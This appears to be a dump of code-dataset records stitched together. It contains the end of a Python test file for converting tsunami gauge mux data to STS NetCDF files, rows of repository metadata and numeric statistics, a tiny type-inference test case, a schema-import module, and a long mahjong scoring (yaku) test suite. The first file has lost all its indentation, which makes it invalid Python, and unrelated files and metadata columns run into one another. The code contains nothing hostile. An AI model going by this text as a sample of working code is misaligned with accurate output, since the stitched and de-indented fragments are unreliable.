first_tstep[2]+=1
last_tstep=(time_step_count)*num.ones(n,int)
last_tstep[0]-=1
gauge_depth=20*num.ones(n,float)
ha=2*num.ones((n,time_step_count),float)
ha[0]=num.arange(0,time_step_count)
ha[1]=num.arange(time_step_count,2*time_step_count)
ha[2]=num.arange(2*time_step_count,3*time_step_count)
ha[3]=num.arange(3*time_step_count,4*time_step_count)
ua=5*num.ones((n,time_step_count),float)
va=-10*num.ones((n,time_step_count),float)
base_name, files = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=gauge_depth,
ha=ha,
ua=ua,
va=va)
urs2sts(base_name,
basename_out=base_name,
mean_stage=tide,verbose=False)
# now I want to check the sts file ...
sts_file = base_name + '.sts'
#Let's interigate the sww file
# Note, the sww info is not gridded. It is point data.
fid = NetCDFFile(sts_file)
# Make x and y absolute
x = fid.variables['x'][:]
y = fid.variables['y'][:]
geo_reference = Geo_reference(NetCDFObject=fid)
points = geo_reference.get_absolute(list(zip(x, y)))
points = ensure_numeric(points)
x = points[:,0]
y = points[:,1]
#Check that first coordinate is correctly represented
#Work out the UTM coordinates for first point
for i in range(4):
zone, e, n = redfearn(lat_long_points[i][0], lat_long_points[i][1])
assert num.allclose([x[i],y[i]], [e,n])
#Check the time vector
times = fid.variables['time'][:]
times_actual = []
for i in range(time_step_count):
times_actual.append(time_step * i)
assert num.allclose(ensure_numeric(times),
ensure_numeric(times_actual))
#Check first value
stage = fid.variables['stage'][:]
xmomentum = fid.variables['xmomentum'][:]
ymomentum = fid.variables['ymomentum'][:]
elevation = fid.variables['elevation'][:]
# Set original data used to write mux file to be zero when gauges are
#not recdoring
ha[0][0]=0.0
ha[0][time_step_count-1]=0.0;
ha[2][0]=0.0;
ua[0][0]=0.0
ua[0][time_step_count-1]=0.0;
ua[2][0]=0.0;
va[0][0]=0.0
va[0][time_step_count-1]=0.0;
va[2][0]=0.0;
assert num.allclose(num.transpose(ha),stage) #Meters
#Check the momentums - ua
#momentum = velocity*(stage-elevation)
# elevation = - depth
#momentum = velocity_ua *(stage+depth)
depth=num.zeros((len(lat_long_points),time_step_count),float)
for i in range(len(lat_long_points)):
depth[i]=gauge_depth[i]+tide+ha[i]
assert num.allclose(num.transpose(ua*depth),xmomentum)
#Check the momentums - va
#momentum = velocity*(stage-elevation)
# elevation = - depth
#momentum = velocity_va *(stage+depth)
assert num.allclose(num.transpose(va*depth),ymomentum)
# check the elevation values.
# -ve since urs measures depth, sww meshers height,
assert num.allclose(-elevation, gauge_depth) #Meters
fid.close()
self.delete_mux(files)
os.remove(sts_file)
def test_urs2sts_nonstandard_meridian(self):
"""
Test single source using the meridian from zone 50 as a nonstandard meridian
"""
tide=0
time_step_count = 3
time_step = 2
lat_long_points =[(-21.,114.5),(-21.,113.5),(-21.,114.), (-21.,115.)]
n=len(lat_long_points)
first_tstep=num.ones(n,int)
first_tstep[0]+=1
first_tstep[2]+=1
last_tstep=(time_step_count)*num.ones(n,int)
last_tstep[0]-=1
gauge_depth=20*num.ones(n,float)
ha=2*num.ones((n,time_step_count),float)
ha[0]=num.arange(0,time_step_count)
ha[1]=num.arange(time_step_count,2*time_step_count)
ha[2]=num.arange(2*time_step_count,3*time_step_count)
ha[3]=num.arange(3*time_step_count,4*time_step_count)
ua=5*num.ones((n,time_step_count),float)
va=-10*num.ones((n,time_step_count),float)
base_name, files = self.write_mux2(lat_long_points,
time_step_count, time_step,
first_tstep, last_tstep,
depth=gauge_depth,
ha=ha,
ua=ua,
va=va)
urs2sts(base_name,
basename_out=base_name,
central_meridian=123,
mean_stage=tide,
verbose=False)
# now I want to check the sts file ...
sts_file = base_name + '.sts'
#Let's interigate the sww file
# Note, the sww info is not gridded. It is point data.
fid = NetCDFFile(sts_file)
# Make x and y absolute
x = fid.variables['x'][:]
y = fid.variables['y'][:]
geo_reference = Geo_reference(NetCDFObject=fid)
points = geo_reference.get_absolute(list(zip(x, y)))
points = ensure_numeric(points)
x = points[:,0]
y = points[:,1]
# Check that all coordinate are correctly represented
# Using the non standard projection (50)
for i in range(4):
zone, e, n = redfearn(lat_long_points[i][0],
lat_long_points[i][1],
central_meridian=123)
assert num.allclose([x[i],y[i]], [e,n])
assert zone==-1
self.delete_mux(files)
def test_Urs_points(self):
time_step_count = 3
time_step = 2
lat_long_points =[(-21.5,114.5),(-21.5,115),(-21.,115)]
base_name, files = self.write_mux(lat_long_points,
time_step_count, time_step)
for file in files:
# Check contents first
mux_file = open(file, 'rb')
data = mux_file.read()
#print(data)
urs = Read_urs(file)
assert time_step_count == urs.time_step_count
assert time_step == urs.time_step
for lat_lon, dep in zip(lat_long_points, urs.lonlatdep):
_ , e, n = redfearn(lat_lon[0], lat_lon[1])
assert num.allclose(n, dep[2])
count = 0
for slice in urs:
count += 1
#print slice
for lat_lon, quantity in zip(lat_long_points, slice):
_ , e, n = redfearn(lat_lon[0], lat_lon[1])
#print "quantity", quantity
#print "e", e
#print "n", n
if file[-5:] == WAVEHEIGHT_MUX_LABEL[-5:] or \
file[-5:] == NORTH_VELOCITY_LABEL[-5:] :
assert num.allclose(e, quantity)
if file[-5:] == EAST_VELOCITY_LABEL[-5:]:
assert num.allclose(n, quantity)
assert count == time_step_count
self.delete_mux(files)
################################################################################
if __name__ == "__main__":
suite = unittest.makeSuite(Test_Mux,'test')
runner = unittest.TextTestRunner() #verbosity=2)
runner.run(suite)
| 40.284421 | 214 | 0.534211 | 7,961 | 62,320 | 4.01118 | 0.056274 | 0.060877 | 0.076535 | 0.009207 | 0.888078 | 0.867786 | 0.848088 | 0.834121 | 0.821846 | 0.812796 | 0 | 0.031505 | 0.352134 | 62,320 | 1,546 | 215 | 40.310479 | 0.759406 | 0.187051 | 0 | 0.788747 | 0 | 0 | 0.026522 | 0 | 0 | 0 | 0 | 0.001294 | 0.10828 | 1 | 0.016985 | false | 0.003185 | 0.02017 | 0 | 0.04034 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
67ca2cf7db9bff01c821657ae19efb9e72d33454 | 84 | py | Python | tests/test-cases/typeinfer_basecase/case17.py | SMAT-Lab/Scalpel | 1022200043f2d9e8c24256821b863997ab34dd49 | [
"Apache-2.0"
] | 102 | 2021-12-15T09:08:48.000Z | 2022-03-24T15:15:25.000Z | tests/test-cases/typeinfer_basecase/case17.py | StarWatch27/Scalpel | 8853e6e84f318f3cfeda0e03d274748b2fbe30fa | [
"Apache-2.0"
] | 11 | 2021-12-04T11:48:31.000Z | 2022-03-21T09:21:45.000Z | tests/test-cases/typeinfer_basecase/case17.py | StarWatch27/Scalpel | 8853e6e84f318f3cfeda0e03d274748b2fbe30fa | [
"Apache-2.0"
] | 11 | 2021-12-04T11:47:41.000Z | 2022-02-06T09:04:39.000Z | def fun1(a):
return a
def fun2(a):
return a + 1.0
fun2(3.0) + fun1(2.0)
| 8.4 | 21 | 0.52381 | 18 | 84 | 2.444444 | 0.5 | 0.318182 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169492 | 0.297619 | 84 | 9 | 22 | 9.333333 | 0.576271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
e1d9249030746db392a66b9a9ead9368f767ceef | 89 | py | Python | etl/index_schemas/__init__.py | BernarBerdikul/Async_API_part_1 | 0f218f38d099909fad629f6f9443fea4a29be3f8 | [
"BSD-3-Clause"
] | null | null | null | etl/index_schemas/__init__.py | BernarBerdikul/Async_API_part_1 | 0f218f38d099909fad629f6f9443fea4a29be3f8 | [
"BSD-3-Clause"
] | null | null | null | etl/index_schemas/__init__.py | BernarBerdikul/Async_API_part_1 | 0f218f38d099909fad629f6f9443fea4a29be3f8 | [
"BSD-3-Clause"
] | null | null | null | from .film_work_schema import *
from .genre_schema import *
from .person_schema import *
| 22.25 | 31 | 0.797753 | 13 | 89 | 5.153846 | 0.538462 | 0.537313 | 0.477612 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134831 | 89 | 3 | 32 | 29.666667 | 0.87013 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e1e3e1952c38bf839602cb50aa76478a050705a1 | 75,121 | py | Python | tests/test_yaku_types.py | rasca0027/Mahjong4RL | e3f628e61b28598652f589594b5782a7dafd03b9 | [
"MIT"
] | 13 | 2020-10-08T02:13:00.000Z | 2021-09-06T07:45:00.000Z | tests/test_yaku_types.py | rasca0027/Mahjong4RL | e3f628e61b28598652f589594b5782a7dafd03b9 | [
"MIT"
] | 51 | 2020-10-15T01:17:11.000Z | 2022-02-17T02:51:08.000Z | tests/test_yaku_types.py | rasca0027/Mahjong4RL | e3f628e61b28598652f589594b5782a7dafd03b9 | [
"MIT"
] | null | null | null | import unittest
from mahjong.components import Tile, Suit, Jihai, Naki, Huro
from mahjong.player import Player
from mahjong.components import Stack
from mahjong.naki_and_actions import check_tenpai
from mahjong.yaku_types import (
JouKyouYaku, TeYaku, Yakuhai, Peikou, Chanta, Koutsu, Sanshoku, Somete
)
class TestJouKyouYaku(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_menzen_tsumo(self): # 門前清自摸和
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
naki_tile = Tile(Suit.SOUZU.value, 2)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.CHII, naki_tile,
[Tile(Suit.SOUZU.value, i) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
ron = False
yaku_types = JouKyouYaku(
self.player, self.stack, machi_tiles, self.bakaze, ron)
self.assertEqual(yaku_types.menzen_tsumo(), True)
self.assertEqual(yaku_types.total_yaku, ['menzen_tsumo'])
self.assertEqual(yaku_types.total_han, [1])
def test_menzen_tsumo(self): # 門前清自摸和
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
ron = False
yaku_types = JouKyouYaku(
self.player, self.stack, machi_tiles, self.bakaze, ron)
self.assertEqual(yaku_types.menzen_tsumo(), True)
self.assertEqual(yaku_types.total_yaku, ['menzen_tsumo'])
self.assertEqual(yaku_types.total_han, [1])
def test_chankan(self): # 搶槓
...
def test_no_houtei_raoyui(self): # 河底撈魚
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
ron = True
for i in range(121):
_ = self.stack.draw()
yaku_types = JouKyouYaku(
self.player, self.stack, machi_tiles, self.bakaze, ron)
self.assertEqual(yaku_types.houtei_raoyui(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_houtei_raoyui(self): # 河底撈魚
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
ron = True
for i in range(122):
_ = self.stack.draw()
yaku_types = JouKyouYaku(
self.player, self.stack, machi_tiles, self.bakaze, ron)
self.assertEqual(yaku_types.houtei_raoyui(), True)
self.assertEqual(yaku_types.total_yaku, ['houtei_raoyui'])
self.assertEqual(yaku_types.total_han, [1])
def test_no_riichi(self): # 立直
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.is_riichi = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = JouKyouYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.riichi(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_riichi(self): # 立直
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.is_riichi = True
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = JouKyouYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.riichi(), True)
self.assertEqual(yaku_types.total_yaku, ['riichi'])
self.assertEqual(yaku_types.total_han, [1])
def test_ippatsu(self): # 一発
...
def test_no_haitei_raoyue(self): # 海底撈月
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
ron = True
for i in range(122):
_ = self.stack.draw()
yaku_types = JouKyouYaku(
self.player, self.stack, machi_tiles, self.bakaze, ron)
self.assertEqual(yaku_types.haitei_raoyue(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_haitei_raoyue(self): # 海底撈月
for i in range(2, 8):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
ron = False
for i in range(122):
_ = self.stack.draw()
yaku_types = JouKyouYaku(
self.player, self.stack, machi_tiles, self.bakaze, ron)
self.assertEqual(yaku_types.haitei_raoyue(), True)
self.assertEqual(yaku_types.total_yaku, ['haitei_raoyue'])
self.assertEqual(yaku_types.total_han, [1])
def test_rinshan_kaihou(self): # 嶺上開花
...
def test_daburu_riichi(self): # 両立直
...
def test_tenhou(self): # 天和
...
def test_chiihou(self): # 地和
...
class TestTeYaku(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_ryuuiisou(self): # 緑一色
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.HATSU.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.HATSU.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ryuuiisou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_ryuuiisou(self): # 緑一色
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.HATSU.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.HATSU.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ryuuiisou(), True)
self.assertEqual(yaku_types.total_yaku, ['ryuuiisou'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_kokushi_musou(self): # 国士無双
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.kokushi_musou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_kokushi_musou(self): # 国士無双 single wait
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.kokushi_musou(), True)
self.assertEqual(yaku_types.total_yaku, ['kokushi musou'])
self.assertEqual(yaku_types.total_han, [13])
def test_kokushi_musou_13_way(self): # 国士無双 13-way wait
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.PEI.value).index] += 1
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.kokushi_musou(), True)
self.assertEqual(yaku_types.total_yaku, ['kokushi musou 13-way wait'])
self.assertEqual(yaku_types.total_han, [26])
def test_no_chuuren_poutou(self): # 九蓮宝燈
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 0
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.agari_tile = Tile(Suit.SOUZU.value, 2)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chuuren_poutou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_chuuren_poutou(self): # 九蓮宝燈
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 0
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
self.player.agari_tile = Tile(Suit.SOUZU.value, 2)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chuuren_poutou(), True)
self.assertEqual(yaku_types.total_yaku, ['chuuren poutou'])
self.assertEqual(yaku_types.total_han, [13])
def test_junsei_chuuren_poutou(self): # 純正九蓮宝燈
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 3).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 4).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 7).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 8).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chuuren_poutou(), True)
self.assertEqual(yaku_types.total_yaku, ['junsei chuuren poutou'])
self.assertEqual(yaku_types.total_han, [26])
def test_no_toitoihou(self): # 対々和
self.player.hand[Tile(Suit.PINZU.value, 8).index] += 1
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
for tile_rank in range(2, 5):
naki_tile = Tile(Suit.MANZU.value, tile_rank)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.MANZU.value, tile_rank) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 7)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.toitoihou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_no_toitoihou_2(self): # 対々和
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
for tile_rank in range(2, 4):
naki_tile = Tile(Suit.MANZU.value, tile_rank)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.MANZU.value, tile_rank) for i in range(1, 4)]))
naki_tile = Tile(Suit.SOUZU.value, 1)
naki_tile.owner = 3
self.player.kabe.append(
Huro(Naki.CHII, naki_tile,
[Tile(Suit.SOUZU.value, i) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.HAKU.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.toitoihou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_toitoihou(self): # 対々和
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
for tile_rank in range(2, 5):
naki_tile = Tile(Suit.MANZU.value, tile_rank)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.MANZU.value, tile_rank) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.HAKU.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.toitoihou(), True)
self.assertEqual(yaku_types.total_yaku, ['toitoihou'])
self.assertEqual(yaku_types.total_han, [2])
def test_no_chiitoitsu(self): # 七対子
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
for tile_rank in range(2, 5):
naki_tile = Tile(Suit.MANZU.value, tile_rank)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.MANZU.value, tile_rank) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.HAKU.value)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chiitoitsu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_chiitoitsu(self): # 七対子
self.player.hand[Tile(Suit.PINZU.value, 8).index] += 2
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 5).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 1)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chiitoitsu(), True)
self.assertEqual(yaku_types.total_yaku, ['chiitoitsu'])
self.assertEqual(yaku_types.total_han, [2])
def test_no_ikkitsuukan(self): # 一気通貫
for i in range(4, 10):
self.player.hand[Tile(Suit.PINZU.value, i).index] += 1
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 2
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = TeYaku(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ikkitsuukan(), False)
self.assertEqual(yaku_types.total_yaku, [])
